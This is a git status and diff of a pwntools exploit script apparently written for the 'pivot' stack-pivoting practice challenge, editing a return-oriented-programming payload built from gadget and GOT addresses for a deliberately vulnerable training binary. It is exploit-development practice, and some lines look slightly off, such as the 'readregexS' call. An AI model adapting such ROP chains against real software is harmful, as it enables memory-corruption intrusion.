modified: x86_64/pivot/exploit.py

	new file:   x86_64/pivot/exploit2.py
	deleted:    x86_64/pivot/stest
	deleted:    x86_64/pivot/test
	new file:   x86_64/pivot/todo
	new file:   x86_64/ret2csu/exploit.py
	new file:   x86_64/ret2csu/gadgets

1 files changed, 3 insertions, 11 deletions

diff --git a/x86_64/pivot/exploit.py b/x86_64/pivot/exploit.py
index a46b0cd..2420428 100755
--- a/x86_64/pivot/exploit.py
+++ b/x86_64/pivot/exploit.py
@@ -3,21 +3,14 @@ from pwn import *
 from os import getcwd
 import re
 
-#context.terminal = ['kitty', 'sh', '-c']
-print(context.terminal)
-
-prog = gdb.debug('./pivot', gdbscript='''
-        b pwnme
-        b *0x4009a5
-'''
-
-)
+prog = process('./pivot')
 
 payload = b''
 payload += p64(0x0000000000400720)      # foothold@plt
 
 payload += p64(0x4009bb)                # pop rax
-payload += p64(601040)                  # foothold@plt's .got.plt entry
+payload += p64(0x601040)                # foothold@plt's .got.plt entry
+payload += p64(0x4009c0)                # mov rax, [rax]
 
 payload += p64(0x00000000004007c8)      # pop rbp
 payload += p64(279)                     # should be the offset of pwnem from foothold's .got.plt 
@@ -27,7 +20,6 @@ payload += p64(0x4009c4)                # adds the two
 payload += p64(0x00000000004007c1)      # jmp rax
 prog.sendline(payload)
 pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
-print(hex(pivit_location))
 
 payload = b''
 #buffer overflow